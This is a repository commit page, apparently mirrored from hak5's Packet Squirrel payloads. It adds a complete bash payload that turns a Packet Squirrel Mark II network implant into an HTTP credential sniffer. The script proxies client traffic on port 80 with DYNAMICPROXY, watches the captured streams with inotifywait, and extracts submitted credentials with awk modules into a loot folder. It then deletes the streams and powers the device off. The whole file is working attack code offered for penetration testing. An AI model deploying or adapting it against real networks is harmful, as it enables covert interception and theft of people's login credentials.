mirror of
https://github.com/hak5/packetsquirrel-payloads.git
synced 2025-12-19 09:48:47 +00:00
Capturing Credentials Submitted via HTTP
This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
This commit is contained in:
TW-D
GitHub
81
payloads/credentials/capturing-http-credentials/payload
Normal file
81
payloads/credentials/capturing-http-credentials/payload
Normal file
@@ -0,0 +1,81 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Capturing Credentials Submitted via HTTP
|
||||
# Description:
|
||||
# This payload uses inotifywait and DYNAMICPROXY
|
||||
# to monitor the HTTP POST data streams generated
|
||||
# by a client and extract sensitive information using awk.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Prerequisites:
|
||||
# - Packet Squirrel Mark II
|
||||
#
|
||||
# Netmode: NAT
|
||||
#
|
||||
# STATUS
|
||||
# ================
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Waiting for a button press ...................... OFF
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
#
|
||||
|
||||
######## CONSTANTS ########
|
||||
|
||||
PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
|
||||
readonly PAYLOAD_SWITCH
|
||||
|
||||
readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
|
||||
readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
|
||||
readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
|
||||
readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
|
||||
|
||||
###########################
|
||||
|
||||
set -u
|
||||
|
||||
LED SETUP
|
||||
|
||||
NETMODE NAT
|
||||
|
||||
if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
|
||||
mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
|
||||
fi
|
||||
|
||||
LED ATTACK
|
||||
|
||||
credentials_search() {
|
||||
inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
|
||||
if [[ -f "${dynamicproxy_stream}" ]]; then
|
||||
case "${dynamicproxy_stream}" in
|
||||
*_CLIENT.stream)
|
||||
for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
|
||||
awk -f "${awk_module}" "${dynamicproxy_stream}"
|
||||
done
|
||||
;;
|
||||
esac
|
||||
rm "${dynamicproxy_stream}"
|
||||
fi
|
||||
done
|
||||
}
|
||||
credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
|
||||
cs_pid="${!}"
|
||||
|
||||
DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
|
||||
dp_pid="${!}"
|
||||
|
||||
LED OFF
|
||||
|
||||
NO_LED=1 BUTTON
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
kill "${dp_pid}" "${cs_pid}"
|
||||
sync
|
||||
|
||||
LED FINISH
|
||||
|
||||
poweroff
|
||||
Reference in New Issue
Block a user